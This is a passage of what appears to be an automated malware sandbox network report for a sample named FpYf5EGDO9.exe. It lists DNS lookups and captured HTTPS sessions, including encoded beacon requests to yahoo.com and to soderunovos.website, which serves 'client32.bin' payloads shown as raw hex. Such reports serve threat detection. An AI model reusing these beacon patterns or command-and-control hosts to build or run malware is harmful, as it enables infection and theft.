Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	mail.yahoo.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.555768013 CET	8.8.8.8	192.168.2.3	0xaadd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.686436892 CET	8.8.8.8	192.168.2.3	0x4667	No error (0)	login.yahoo.com	ds-ats.member.g02.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 21:01:39.686436892 CET	8.8.8.8	192.168.2.3	0x4667	No error (0)	ds-ats.member.g02.yahoodns.net		212.82.100.140	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yahoo.com

www.yahoo.com

soderunovos.website

lycos.com

www.lycos.com

mail.yahoo.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	74.6.143.26	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:01 UTC	0	OUT	GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 19:59:01 UTC	0	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Nov 2021 19:59:01 GMT Connection: keep-alive Strict-Transport-Security: max-age=31536000 Server: ATS Cache-Control: no-store, no-cache Content-Type: text/html Content-Language: en X-Frame-Options: SAMEORIGIN Set-Cookie: B=emaekhlgpqi05&b=3&s=ke; expires=Wed, 23-Nov-2022 19:59:01 GMT; path=/; domain=.yahoo.com Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw Content-Length: 8
2021-11-23 19:59:01 UTC	1	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	87.248.100.216	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:02 UTC	1	OUT	GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Connection: Keep-Alive Cache-Control: no-cache Host: www.yahoo.com Cookie: B=emaekhlgpqi05&b=3&s=ke
2021-11-23 19:59:02 UTC	1	IN	HTTP/1.1 404 Not Found date: Tue, 23 Nov 2021 19:59:01 GMT p3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" cache-control: private x-content-type-options: nosniff content-type: text/html; charset=UTF-8 x-envoy-upstream-service-time: 14 server: ATS Content-Length: 1052 Age: 1 Connection: close Strict-Transport-Security: max-age=31536000 Content-Security-Policy: frame-ancestors 'self' https://.builtbygirls.com https://.rivals.com https://.engadget.com https://.intheknow.com https://.autoblog.com https://.techcrunch.com https://.yahoo.com https://.aol.com https://.huffingtonpost.com https://.oath.com https://.search.yahoo.com https://.search.aol.com https://.search.huffpost.com https://.verizonmedia.com https://.publishing.oath.com https://.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=; X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block
2021-11-23 19:59:02 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 42 3d 65 6d 61 65 6b 68 6c 67 70 71 69 30 35 26 62 3d 33 26 73 3d 6b 65 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 32 34 20 4e 6f 76 20 32 30 32 32 20 30 31 3a 35 39 3a 30 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 35 37 36 30 30 3b 20 44 6f 6d 61 69 6e 3d 2e 79 61 68 6f 6f 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 0d 0a 45 78 70 65 63 74 2d 43 54 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 2c 20 72 65 70 6f 72 74 2d 75 72 69 3d 22 68 74 74 70 3a 2f 2f 63 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2f 63 73 70 3f 73 72 63 3d 79 61 68 6f 6f 63 6f 6d 2d 65 78 70 65 63 74 2d 63 74 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 22 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 Data Ascii: Set-Cookie: B=emaekhlgpqi05&b=3&s=ke; Expires=Thu, 24 Nov 2022 01:59:02 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"Referrer-Policy: no-ref
2021-11-23 19:59:02 UTC	3	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 75 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 3f 65 72 72 3d 34 30 34 26 65 72 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 66 6a 64 72 61 77 25 32 66 48 48 41 51 34 35 37 42 30 47 74 4c 73 6b 4c 6b 76 25 32 66 5a 69 7a 68 39 54 74 68 68 63 50 63 25 32 66 78 54 30 69 53 33 51 6a 6c 37 79 25 32 66 6b 70 48 30 4d 71 43 34 64 73 7a 42 33 48 25 32 66 48 57 6d 6a 48 75 52 54 66 41 4c 4b 71 63 71 4b 48 4c 65 35 68 25 32 66 35 4b 41 6e 66 4f 53 34 69 5f 32 42 4c 56 69 37 25 32 66 32 4c 36 34 75 35 78 77 76 54 66 33 73 58 70 25 32 66 55 72 4c 6f 65 Data Ascii: <html><meta charset='utf-8'><script>var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoe

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49751	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:22 UTC	4	OUT	GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 19:59:22 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:01 GMT Content-Type: application/zip Content-Length: 178766 Connection: close X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; path=/; domain=.soderunovos.website Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: lang=en; expires=Thu, 23-Dec-2021 12:20:01 GMT; path=/ Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-11-23 19:59:22 UTC	5	IN	Data Raw: 82 b5 80 2c 9d 00 a1 1a f2 32 12 e4 6f 8f b9 7c a1 75 05 3d c3 95 5b b7 8e ec c4 1d ac 3f 66 f4 84 4a 64 2f 5d 0f 27 92 9d 18 f5 19 1d 5a 08 b3 52 b6 35 53 79 36 3a e2 99 33 c1 40 f7 10 09 16 86 bc 84 a4 ae f6 c2 d7 88 a9 5a a3 42 f9 88 cc 99 44 47 c4 ec 3c e3 95 ad 46 fd 35 c8 0d 6e f6 51 58 30 d7 05 52 19 17 13 dd 4b cd 6f 88 37 66 c5 1e 29 f6 c9 17 e0 c7 2b 94 e9 3f c4 63 a0 3e 2e 18 d0 95 62 5f 0b 00 dd eb 0b c3 10 76 1a 97 05 11 b5 74 b5 17 1d 94 35 50 7f 67 43 bd c3 54 5a 83 6f 34 fa c0 46 89 d3 31 c6 ca 9a d4 48 a6 2d 29 40 30 36 40 58 10 4f dc be 5b 5b 5c 67 3c c9 2a 25 68 ea 75 95 9d 48 d3 67 eb 1e 87 79 0c 5a 74 ea f9 6e fa 56 44 52 0e 43 93 eb 16 1f bd 92 05 62 ad 1a 8a cd 91 c4 84 1b 99 f0 6b 08 2d 4c 27 59 71 74 e2 e0 03 9e ab 31 14 5a da 1a Data Ascii: ,2o\|u=[?fJd/]'ZR5Sy6:3@ZBDG<F5nQX0RKo7f)+?c>.b_vt5PgCTZo4F1H-)@06@XO[[\g<*%huHgyZtnVDRCbk-L'Yqt1Z
2021-11-23 19:59:22 UTC	20	IN	Data Raw: 99 b0 0e 30 b1 22 5b 58 68 03 2d 9d 8d 66 11 e6 b2 c0 a8 ee 4f 44 cb 4c 7f 5b ff 5e 9b 7c 98 95 d2 80 18 91 9f b0 81 07 2d 81 4e a9 a1 e1 7d c5 e3 cb 6d 65 61 93 3c 30 cb 0e 50 0d 4d d1 4d 21 b8 ec 5d 77 0f 28 66 f7 9a 67 4a 51 cf e8 62 82 59 92 dc 85 64 2a 42 4c 31 7c 1c 78 7f ae 21 8b 21 1b b8 c8 99 21 02 f0 08 5c 9c 38 b3 fe 53 28 20 f7 de 96 65 9d b9 85 e3 34 5e e4 08 18 aa b9 47 49 b1 ae b3 8a 46 e2 30 bb 3d ca 49 15 e8 8d 77 54 9f 5f ef fd f6 fb f0 92 c3 0f 05 a6 c9 4c 26 71 d8 3a 37 71 98 9b 98 de 03 e3 3a be 6b af b6 b1 40 ae 7d 93 c0 8c 0f f5 72 03 73 f5 75 4a ea 9a f2 bc 04 31 a0 b7 92 a7 a3 17 20 16 ba 20 63 1f 5d ea 4f a4 d4 29 dc 90 d6 b4 bb d9 3b d7 8b f4 3f b4 a4 da 7e d0 52 c5 d4 ec 30 10 11 6c 21 5b 94 fb 60 ee 5e 44 d5 59 9b 3a be c8 b7 Data Ascii: 0"[Xh-fODL[^\|-N}mea<0PMM!]w(fgJQbYd*BL1\|x!!!\8S( e4^GIF0=IwT_L&q:7q:k@}rsuJ1 c]O);?~R0l![`^DY:
2021-11-23 19:59:23 UTC	36	IN	Data Raw: 1a ae c6 d5 9a 94 5a e1 3a f8 aa d2 fd 16 12 aa 29 4a e0 1e bf 4c e5 c6 e5 be 4f 00 de 81 19 19 72 57 40 28 04 da da db e4 f2 1f 60 a8 46 db ac 9b c7 1b 87 28 62 74 7d c7 da 2d 34 db 12 5d f8 a4 89 47 13 ea c8 9e 83 29 de 02 9f 7c 5e 74 0b 4b 10 2d e9 c6 03 60 c4 e8 98 f0 74 dc d3 b7 4d 58 1c c6 12 80 7c 64 3e fd 89 5e 7f 75 79 6a 3e 96 0b c3 84 f6 e2 5a 84 60 75 ec 9d 4e 69 84 11 e0 4a 4b a8 07 0a 0f d0 25 bb fc 2d a4 17 32 e1 6e 73 90 68 8b 8d 8e a1 ce 00 6b dd 95 0d ef b0 ed cb 19 2d ee 31 45 66 47 ba a0 04 47 c4 f8 46 49 29 94 ca 21 61 be 86 f5 30 59 b9 7e da ee 13 d2 7a 67 f6 15 ee ea 3e 68 e7 50 55 13 13 9b aa 67 ec 90 75 e5 60 96 9d b1 0c 6b 5c 29 de 60 52 a2 88 df 27 92 c9 43 9a d2 0f 7c 8d 77 ee e6 1e 6b 3a bc 31 5b 45 07 28 6e 53 43 bc a4 1c 65 Data Ascii: Z:)JLOrW@(`F(bt}-4]G)\|^tK-`tMX\|d>^uyj>Z`uNiJK%-2nshk-1EfGGFI)!a0Y~zg>hPUgu`k\)`R'C\|wk:1[E(nSCe
2021-11-23 19:59:23 UTC	52	IN	Data Raw: e9 1c d5 eb 36 99 17 9e 7c 67 fe f4 01 75 87 36 67 51 d5 ae 5a 81 65 9c 5e 9e 9e 45 da de c9 7c 34 87 35 eb 11 e4 6c 50 9c 76 17 68 6c ac 49 15 94 a4 ff 73 9b 4d a0 62 3f 68 85 4c 83 a2 68 d8 83 2b b3 56 38 62 28 91 a5 8d 2d c8 dc 52 4d a8 73 87 94 88 90 45 cd 17 75 c8 33 73 63 dc a9 ab f7 45 2b 34 1b a0 1c f1 51 1a cf e3 4e 51 23 1d bf 1f e9 ed 39 e3 08 bc ea 81 53 ea ef 4c 33 df 8a 2c bf 20 dc ac 6f 34 60 de c3 a1 65 a0 04 cc b9 3c 34 ad 44 27 a5 35 18 24 37 8d 5a 64 d7 70 fc bf 75 ac fb ea 7d 2d 26 c2 dc 5e c0 eb 92 59 3b 85 e8 53 6a c4 34 c5 d6 35 fc ec 3d 6c 97 90 aa 3b 28 c6 74 8c 89 03 a3 4d f2 e9 57 61 92 a2 bd fd a0 44 23 51 5f aa 7d 6f b7 07 da 79 d8 7a 26 54 cd 51 1c 87 ae d0 31 45 7f 7b 5c 91 9c 15 74 59 7e ce 7c ea 8b 63 52 53 34 9e fc d4 87 Data Ascii: 6\|gu6gQZe^E\|45lPvhlIsMb?hLh+V8b(-RMsEu3scE+4QNQ#9SL3, o4`e<4D'5$7Zdpu}-&^Y;Sj45=l;(tMWaD#Q_}oyz&TQ1E{\tY~\|cRS4
2021-11-23 19:59:23 UTC	68	IN	Data Raw: 95 4f 3a f4 97 61 39 28 5c 1d 24 30 8c de e6 c5 16 cd 7d a4 db d9 07 1f 28 28 38 9a 95 0d 13 82 86 12 6b a6 71 0c 50 bc c5 1d e1 ba 2e a2 d1 d1 5b e5 c4 af 57 75 c6 f5 8c 52 3e 16 54 43 02 2b 89 39 ca ff eb d6 b3 1e a1 c4 a0 56 e6 1d 60 59 77 ed 9e 2c 0a e8 b0 6d 23 21 e1 2b b0 9d 66 f8 d1 b2 0d 49 34 1c 83 61 16 1d 30 08 32 d2 11 85 96 1c 92 e5 84 d7 0a e2 78 5d b6 83 4d 9c 5d 22 a7 18 99 ea 97 1e 32 6c 00 8e b4 7f 9e 94 10 59 f0 a6 9f ce 2c 48 95 9b c1 39 ac 9a ec f3 67 c1 b1 14 6a e4 3f aa 73 0a 4c d7 38 ef 0d c1 d1 37 f1 e4 21 52 d6 7b dd 3e fd ff 57 56 05 64 16 6e 32 9a a8 66 0c 4e 6e ac 7f fa 65 fe cf ab 16 c5 90 02 23 1c 68 30 4d 04 b2 b5 2e a6 8a 67 d5 a1 f0 78 80 c7 b9 11 05 8b 3b f1 06 9a 49 86 75 9c c1 c0 10 71 91 ae 4e 66 cf 0a 67 1b aa 16 a4 Data Ascii: O:a9(\$0}((8kqP.[WuR>TC+9V`Yw,m#!+fI4a02x]M]"2lY,H9gj?sL87!R{>WVdn2fNne#h0M.gx;IuqNfg
2021-11-23 19:59:23 UTC	84	IN	Data Raw: 62 22 97 34 b0 ee 66 36 cf 22 18 04 67 c8 74 1a d8 94 3a 19 8b 14 93 d2 5b 69 eb 02 98 98 1a 01 48 88 ef ab 09 67 c2 11 54 c4 69 55 0f ab 3e 0a d1 d6 87 6a d7 7a ee ac 19 ac fb 3f 16 68 f8 c4 ff d2 be 24 30 e8 88 a8 7b 7b 43 73 a5 ca 73 58 fc c3 70 e2 eb 71 4a e4 1d 72 63 bb c3 95 ea 41 ca b7 19 2e 71 b8 aa 8c 51 dc 84 1b 04 3d 05 a5 d5 94 7a ca ae 19 74 9e 33 34 cb 50 e4 71 ba b4 d9 b0 6e 9e 50 fb 5c 9c b1 db 12 1b 11 ee cb c2 27 cc ad da 18 3f 85 cb 1f a8 39 90 5b 8d aa 29 4c fc bb 6a 8c 9e f5 bb 08 4d 2d 5a ac 5b b7 8b c4 ad 00 23 98 81 31 da dc 61 90 c7 a5 36 28 d6 68 2a 11 80 5e 07 63 26 c8 ac 2b 84 8f 3d 1a 3e bf d9 52 a4 b4 d0 4a 9d e1 a8 e5 40 2a ea 81 6b 03 e6 0b cf 63 29 a1 87 e5 3c db 60 fe b7 1a 6f 19 e6 f3 08 c4 ab 39 fb 0e 45 4d cd 5e 98 1a Data Ascii: b"4f6"gt:[iHgTiU>jz?h$0{{CssXpqJrcA.qQ=zt34PqnP\'?9[)LjM-Z[#1a6(h^c&+=>RJ@kc)<`o9EM^
2021-11-23 19:59:23 UTC	100	IN	Data Raw: 16 d9 5e d3 aa b4 ec e0 c1 4a 4b fa f6 20 f6 b0 01 21 67 52 a9 bc b4 80 39 3b 63 da b3 27 3e 87 ff de 0a 29 d7 b2 21 34 7e 77 76 d9 8f bf ef f3 0c c5 e5 9c 39 a7 20 16 59 3b d4 64 13 93 03 13 41 30 ad 65 fe c6 b6 52 c7 42 3f 2d 4b c4 21 8a b5 f7 74 86 e9 9a 3a 9b ce 0a 7b b8 46 2e d4 be 7e 87 85 27 48 2a ff 9e 62 c1 e1 81 da 9b c8 32 44 e8 a9 14 99 c8 0d 6a ac c5 4c 15 24 c7 cd 4f f4 91 ab 29 da 7a c7 a4 96 41 36 bc 3d 04 74 74 fe 93 ef 87 dc 52 73 d4 47 60 6f ca 11 bd b3 5e 46 66 66 a7 f0 f8 23 75 31 0b f7 dd 7a df 7a 26 32 00 51 c6 a2 f5 f2 cd b6 81 f1 2b b3 3a 3c b0 86 b9 e0 a5 8e 44 49 9e 1f 93 9e 21 fc 28 b5 46 e6 50 61 34 d5 d4 83 14 d7 99 aa 71 f5 3d e1 3a 0b 91 96 3e b4 02 2b 4a a8 f7 b5 26 2b ee 71 18 ae 0f 2a 16 cd 7b d8 84 b9 e3 f5 fc 4c 95 01 Data Ascii: ^JK !gR9;c'>)!4~wv9 Y;dA0eRB?-K!t:{F.~'Hb2DjL$O)zA6=ttRsG`o^Fff#u1zz&2Q+:<DI!(FPa4q=:>+J&+q{L
2021-11-23 19:59:23 UTC	116	IN	Data Raw: 75 f6 50 ec 63 bb 17 40 2d 74 1e 4e d2 8a f2 7b dd 35 d8 38 0a 2a 74 bd 29 96 97 f8 82 f5 45 cb 0c 6c b6 39 89 90 0a 76 10 f0 43 73 3e 54 b5 80 ff 09 73 7f c3 3d 3f 59 71 51 e2 20 52 76 e9 a7 3f dd 7d 4c a3 42 ef 96 ec 6e a4 f4 40 a1 de 08 5b 1a 68 86 f3 0c c2 c5 f2 65 92 99 a0 16 88 1f f7 07 e1 a3 8c 97 83 76 4d d8 39 72 98 a8 82 41 01 d7 0d 3e 95 b7 ee 04 bb d3 8f 23 66 80 0f a0 7c a0 2d 6f d5 bf 71 3c 47 5d ad 7b f7 e0 fd ac a9 22 9a 11 ff a3 db 11 1d 05 82 9f 48 04 df 3f 49 63 82 3a 76 77 17 34 da 9b 97 60 14 3f f9 fb d1 e9 e7 23 ee f6 89 e3 b3 ba 7b 1a 3c 98 e5 74 8b 20 03 ed 11 24 26 55 04 1e e6 6a 7c f7 b1 7f f0 26 be 6c 02 c2 43 6b c4 59 f4 01 8f 4b 33 9b f7 05 82 22 bd 80 fb cd bd d0 de 30 d7 54 97 73 b1 1d 77 57 a6 1c 3c 83 c8 81 8f 92 dd ca 44 Data Ascii: uPc@-tN{58*t)El9vCs>Ts=?YqQ Rv?}LBn@[hevM9rA>#f\|-oq<G]{"H?Ic:vw4`?#{<t $&Uj\|&lCkYK3"0TswW<D
2021-11-23 19:59:23 UTC	132	IN	Data Raw: b6 af cd dc 93 6d 7e f1 1e b8 de b4 d3 97 7a b3 23 4a d5 e6 7f 83 d2 b3 44 30 56 33 28 bf 14 58 7c 15 0f 07 0b c1 ec e2 46 f3 ac 5b 90 66 f8 d3 f3 3a 0d 63 b2 1a 8e 5d 45 58 20 dd 7d 64 8a 82 71 1e 37 d2 78 e3 4c 90 88 52 96 a7 2d 92 7e bc 78 c7 72 30 24 ac 5b 93 a1 f6 f9 a1 46 b4 7e 64 a9 3a 90 ab ca 14 3b bf d1 89 9c 08 e4 ca ac 99 a9 ef 13 13 8d 4a 04 a1 bd ac a4 24 4e 8d 09 87 d4 87 77 19 8c 4c d2 20 96 d5 98 c6 28 bb a1 b7 df 25 02 53 0f bd 3c 40 fb f6 fc 90 e7 68 8d 0f 2f 2d c8 cc 51 f7 44 df ef 7b d2 40 cd e9 01 49 99 21 bf 07 c0 d7 7c a1 0f 41 6c 10 2f e7 3a 3f 49 83 99 b0 ab 3c b7 2e 2c 5d 4e ca 77 a5 f0 fe 1e 34 8d 0c cb 68 c0 7a 37 fe 8d 17 bd 62 d0 26 09 c4 fc dd 69 eb 9c a8 f1 dc f1 f3 3b b1 48 c7 c4 b6 4d 09 49 05 ad e2 02 f2 e0 b9 c7 a7 3c Data Ascii: m~z#JD0V3(X\|F[f:c]EX }dq7xLR-~xr0$[F~d:;J$NwL (%S<@h/-QD{@I!\|Al/:?I<.,]Nw4hz7b&i;HMI<
2021-11-23 19:59:23 UTC	148	IN	Data Raw: b7 31 95 64 7a 27 d8 8b 46 6f fc f2 d1 ec 23 31 ae 69 ff d8 a0 fa cf 00 fa c6 47 88 37 75 d6 9b 41 dc 10 85 eb df d5 5c 38 6c 8b 6b 3d a4 06 e2 6e 46 83 53 36 3e 18 77 3c 37 73 96 5e 31 7b 60 b3 53 a6 ea 79 e6 fb 30 e9 1e 7a bb e7 97 e1 0a 56 ba 9c 93 b2 83 b1 26 bf 33 2c d5 12 39 c8 c7 dd 53 d4 95 5f 50 cb cf 55 27 9c 85 42 7f 9e d0 c5 54 ff eb 51 17 c9 49 4f 3d 5a fb 27 bc 09 c0 40 8b ca fd ec d5 58 2e 5a 4c 03 11 a3 49 6d 0f 46 aa f9 cf 85 3f ea 69 2a 02 69 41 fd 3b 24 a5 2f e6 45 d5 55 21 2d 38 ed 09 44 90 9c 8f 22 8e 2f 93 ba 50 1d d0 0f 71 22 7b 52 22 dd 93 5e d4 74 01 27 22 37 3b 6c c8 e9 79 d7 4b 56 e4 23 15 2b b9 46 ea 27 d0 27 cc 6a 41 cb 89 4f 4d f1 b4 5d 14 bd 88 f9 bb fa 4d 5c c2 02 b0 2d 2a a4 00 f6 29 eb 65 be 44 73 7e e1 2c 57 97 6e 1e 4e Data Ascii: 1dz'Fo#1iG7uA\8lk=nFS6>w<7s^1{`Sy0zV&3,9S_PU'BTQIO=Z'@X.ZLImF?iiA;$/EU!-8D"/Pq"{R"^t'"7;lyKV#+F''jAOM]M\-)eDs~,WnN
2021-11-23 19:59:23 UTC	164	IN	Data Raw: 62 b0 f1 24 af 00 78 9e 8f fb fe e2 b7 cb d6 bc 91 48 65 87 bb ab c2 c7 15 7d 57 ec a3 92 10 70 24 da 0b 8d b2 f0 3d 31 50 9e 1e b4 26 09 f9 5c 6c 90 3e c3 56 74 a7 71 04 d4 d0 f8 97 a9 57 8e ad 79 2d ad 14 3a ed 32 64 51 2e 4e 08 e2 34 8c e0 32 7b 9b 93 50 8c 3e bf 28 90 59 87 7e 60 fe 5c bd 08 e0 40 d3 f6 87 45 13 5c 25 15 db cf 09 71 a0 e6 c1 86 db bd 37 ce 30 fc 50 da da a6 89 37 f8 f2 92 f1 eb ea e0 9d 90 d7 2b 20 0e 1f 82 43 17 69 7c bd 96 35 05 74 f2 a0 c1 eb b9 ae e5 01 4c 51 db e2 52 5e b2 ca 6c 54 2d bf 61 d2 2a 65 2d b0 ba 2b f5 87 b6 8f c9 cc fa 31 bb a1 df 28 d1 a3 43 c3 ba b5 5c 07 0b 27 d5 8f 4d 4b 2a 6b 46 b4 7b a4 0e 46 a7 6a 7a 7f 7c 5c 5a f9 77 a3 ef 32 32 a2 c0 e0 46 c8 5d f1 fb d0 72 99 19 15 9c a4 0f ca c7 92 a8 ac ec a9 30 e0 24 36 Data Ascii: b$xHe}Wp$=1P&\l>VtqWy-:2dQ.N42{P>(Y~`\@E\%q70P7+ Ci\|5tLQR^lT-ae-+1(C\'MKkF{Fjz\|\Zw22F]r0$6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49753	89.44.9.140	443	C:\Users\user\Desktop\FpYf5EGDO9.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 19:59:23 UTC	179	OUT	GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: soderunovos.website Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
2021-11-23 19:59:23 UTC	180	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 23 Nov 2021 12:20:01 GMT Content-Type: application/zip Content-Length: 227905 Connection: close X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-11-23 19:59:23 UTC	180	IN	Data Raw: 3d 3b 53 33 e9 23 05 65 c0 44 5b ca ce a5 e4 ac a5 e6 d3 da 25 d9 4c 1e fa 52 4d e7 67 59 a7 ba 6e 0b cc d9 ab 48 4a 6d 3a 95 e3 f3 40 d2 27 fb b0 d4 0a 5f 05 e2 a1 cf 93 62 ed 68 50 ec 69 5c 6b 91 91 06 3c e9 ff dd 6c 96 1d 73 a8 45 bf 64 37 6c b0 94 b9 72 3c 09 54 f1 6c 0a f4 55 d9 e4 2f 8e ef 7c 4e 07 7b ea cc 78 24 7d 87 f0 cd 0a 99 5a 45 fd c4 cb e4 a7 7f a1 ca cb 69 3c 65 45 24 b0 e0 2e 7e 61 75 de c8 20 f0 68 55 4f 6e b1 f0 39 92 38 57 a8 29 74 ff 7c f2 5b e2 5f 15 b9 ce ad 4e ff e9 a2 9c 2d 1f 05 1f 19 53 fc e8 9e 84 a0 2d cd 87 99 f0 2a 5f a4 e4 8e 6f ef 20 61 f7 89 ab c2 5b 7a 02 52 9b 3c 5d be e4 fa f6 d1 c0 fb a3 29 38 fe 72 9b 84 88 52 75 87 14 88 9c da 54 d2 3a d6 59 42 a2 e9 e9 61 8f c3 ef 64 8f 8c 47 16 31 5a ce fb 30 fc 50 18 c7 5c 21 ec Data Ascii: =;S3#eD[%LRMgYnHJm:@'_bhPi\k<lsEd7lr<TlU/\|N{x$}ZEi<eE$.~au hUOn98W)t\|[_N-S-*_o a[zR<])8rRuT:YBadG1Z0P\!
